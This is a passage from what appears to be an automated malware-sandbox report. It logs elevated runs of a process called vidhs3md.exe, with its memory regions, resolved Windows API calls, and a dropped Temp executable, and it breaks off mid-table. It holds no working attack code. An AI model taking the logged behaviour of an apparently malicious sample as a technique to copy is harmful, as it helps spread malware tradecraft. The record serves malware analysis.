| Get Filename | - | process_name = c:\windows\syswow64\schtasks.exe, file_name_orig = C:\Windows\SysWOW64\schtasks.exe, size = 260 |
|
2 |
Process #148: vidhs3md.exe
175
0
| Information | Value |
|---|---|
| ID | #148 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula "restaurant.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:57, Reason: Child Process |
| Unmonitor | End Time: 00:05:00, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcac |
| Parent PID | 0xc60 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CB0
0x
CD4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00200000 | 0x002bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x00857fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x009e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x01deffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74550000 | 0x745e1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74730000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x74730000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x74731580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x74731500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x74731560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:35 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #149: vidhs3md.exe
175
0
| Information | Value |
|---|---|
| ID | #149 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula "expenditurevincenttablet.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:57, Reason: Child Process |
| Unmonitor | End Time: 00:05:00, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcb4 |
| Parent PID | 0xc54 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CB8
0x
CD8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
